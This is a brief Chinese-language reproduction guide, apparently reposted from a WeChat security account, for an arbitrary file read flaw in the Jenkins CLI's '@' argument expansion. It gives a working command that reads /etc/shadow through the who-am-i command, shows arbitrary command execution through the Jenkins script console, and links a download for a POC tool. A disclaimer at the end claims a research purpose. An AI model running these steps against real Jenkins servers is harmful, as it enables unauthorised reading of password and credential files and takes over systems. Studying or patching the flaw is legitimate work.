Jenkins处理CLI命令的命令解析器中的expandAtFile功能存在任意文件读取漏洞,未经身份认证的远程攻击者利用该漏洞可以读取部分文件的有限行内容,攻击者经过身份验证或目标Jenkins更改了默认”Security”配置可以通过该漏洞读取任意文件,攻击者进一步利用该漏洞并结合其他功能可能导致任意代码执行。
java -jar jenkinscli.jar -s http://xxxx/ who-am-i @/etc/shadow
使用who-ami-i可以未授权读取文件,但是只限一行,用@指定读取文件路径
成功读取/etc/hosts和/etc/shadow
点击系统管理->脚本命令行,此处可以执行任意命令
println "whoami".execute().text
输入命令执行,获取返回结果
获取POC
工具下载地址:https://wwl.lanzoum.com/i29zH1mq4y7a
原文始发于微信公众号(HackingWiki漏洞感知):复现(附POC) | Jenkins任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论